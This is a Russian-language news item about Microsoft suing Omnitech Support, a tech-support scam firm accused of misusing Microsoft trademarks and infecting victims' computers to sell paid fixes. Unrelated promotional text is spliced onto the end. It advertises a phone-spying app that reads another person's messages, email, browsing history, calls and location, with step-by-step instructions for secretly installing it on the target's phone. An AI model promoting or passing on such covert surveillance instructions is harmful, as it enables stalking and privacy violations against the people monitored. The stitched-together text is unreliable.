Мошенники маскировались под службу поддержки Microsoft

88bad72fcc25f1ebb86e27b4a2c8f723 Виновниками инцидента признаны сотрудники Omnitech Support, которые ранее неоднократно пользовались всемирно известным брендом Microsoft в личных целях, пытаясь оказывать пользователям услуги поддержки. Юристы корпорации уже подали официальный иск в суд, теперь дело будет рассматриваться на федеральном уровне штатов США. Как считают представители Microsoft, ответчик регулярно нарушал деловую этику, чем лишь дискредитировал имидж корпорации.

Перечень мошеннических организаций, действующих в Интернете под прикрытием службы поддержки, достаточно обширен, он насчитывает множество юридических лиц. Некоторые зарегистрировали свою деятельность официально, платят налоги, но не получали одобрения Microsoft, и даже не обращались к ней за этим. Только в ушедшем году число полученных жалоб от пользователей, которые сообщали о фактах подобного мошенничества, составило 65 тысяч штук. Microsoft обещает, что грядущий процесс станет лишь первым в целой серии судебных разбирательств. Ожидается привлечение к ответственности каждого, кто пытался делать деньги на бренде, обманывая пользователей.

Мошенничество Omnitech не ограничивалось обычной текстовой консультацией и бесплатной помощью\, как это принято в официальной поддержке Microsoft. Клиентам предлагались и некоторые платные услуги, люди охотно верили легальности подобной деятельности. На сайте Omnitech присутствуют товарные знаки, права на которые принадлежат исключительно корпорации Microsoft. Использование таких символов грубо нарушает лицензионные соглашения и права на зарегистрированные марки.

В судебных исках отмечается и факт прямой угрозы компьютерам пользователей. Зачастую сами мошенники Omnitech Support заражали машины жертв вирусами и вредоносным ПО, а затем предлагали установить платный антивирус, или воспользоваться услугами удалённых специалистов по безопасности. Подобное мошенничество карается и на уровне Уголовного Кодекса, не говоря уже о значительных штрафных санкциях. Но главный удар эта компания получит по имиджу, вряд ли кто-нибудь захочет иметь с ней дело в будущем.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.